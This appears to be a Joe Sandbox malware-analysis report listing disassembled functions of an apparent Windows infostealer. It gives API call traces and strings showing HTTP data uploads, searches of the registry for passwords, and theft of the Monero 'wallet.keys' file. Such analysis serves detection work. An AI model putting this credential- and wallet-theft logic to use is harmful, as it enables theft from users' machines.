Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,04280B98), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,04280AE8,?,04288878,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,04280A48,00000000,?,04287C00,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
HeapAlloc.KERNEL32(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

------, xrefs: 004052EF
--, xrefs: 00404F34
------, xrefs: 0040506B
J&f, xrefs: 00405029
", xrefs: 004053BA
", xrefs: 00405278
------, xrefs: 00404F4B
------, xrefs: 004051AD
", xrefs: 00405136

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$J&f
API String ID: 2633831070-3705675087
Opcode ID: 01261bdf6723a200b5421c223d7f00b23ed53855c071487a53c0a556e197c9d9
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 01261bdf6723a200b5421c223d7f00b23ed53855c071487a53c0a556e197c9d9
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,04280B98), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,04280B58,00000000,?,04287C00,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,04280AE8,?,04288878,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

J&f, xrefs: 00405878
------, xrefs: 004058BB
", xrefs: 00405985
-A, xrefs: 00405620, 00405D27, 00405623
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
------, xrefs: 00405746
------, xrefs: 004059FC
", xrefs: 00405AC6

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A$J&f
API String ID: 148854478-1022722094
Opcode ID: e183de8ad69be28840d2cf6897d3804b69c1c75c35a8e68d1b55f53e2e4ad93b
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: e183de8ad69be28840d2cf6897d3804b69c1c75c35a8e68d1b55f53e2e4ad93b
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0427DC48,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: dc7bccc8004eed63f55d8513578fb7438147e61491ea64dd30b1a0ec20e3afb5
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: dc7bccc8004eed63f55d8513578fb7438147e61491ea64dd30b1a0ec20e3afb5
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287A20,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0427DC48,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: ddc68b4faf9fd6cfd03a477aaab1a6e14f1876e64d104e0eea04d4d6aef363fc
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: ddc68b4faf9fd6cfd03a477aaab1a6e14f1876e64d104e0eea04d4d6aef363fc
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,04280B98), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04280BB8), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,04280AE8,?,04288878,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

J&f, xrefs: 004047A5
", xrefs: 004048B2
", xrefs: 004049F3
------, xrefs: 0040467D
------, xrefs: 00404929
------, xrefs: 004047E8

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$J&f
API String ID: 460715078-2398766951
Opcode ID: 934bb100f5119b83edcb9fd6f9fa197993457016e65ac099dd7a118cb910b985
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: 934bb100f5119b83edcb9fd6f9fa197993457016e65ac099dd7a118cb910b985
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,042834D0,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

%s\%s, xrefs: 00414BEA
- , xrefs: 00414D40
?, xrefs: 00414B17

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: f425f73bd7a44a6b109507ece3bbcb99bef99a4d6a9d3e44cc97b06e4837372c
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: f425f73bd7a44a6b109507ece3bbcb99bef99a4d6a9d3e44cc97b06e4837372c
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0427DC48,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287A20,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04280B98), ref: 00404ED9

Strings

\Monero\wallet.keys, xrefs: 0040134D
SOFTWARE\monero-project\monero-core, xrefs: 004012F5
.keys, xrefs: 0040132B
wallet_path, xrefs: 004012F0

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: bcf02e3bd6a5e9bd87c62f126014b2e7b3a913a3d9291dbfa5b5e0c127ed371d
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: bcf02e3bd6a5e9bd87c62f126014b2e7b3a913a3d9291dbfa5b5e0c127ed371d
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(3096B020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(3096B020,00000000), ref: 00407018
lstrcat.KERNEL32(3096B020, : ), ref: 0040702A
lstrcat.KERNEL32(3096B020,00000000), ref: 0040705F
lstrcat.KERNEL32(3096B020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(3096B020,00000000), ref: 004070A3
lstrcat.KERNEL32(3096B020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

h0A, xrefs: 00406FA6, 00406FA9
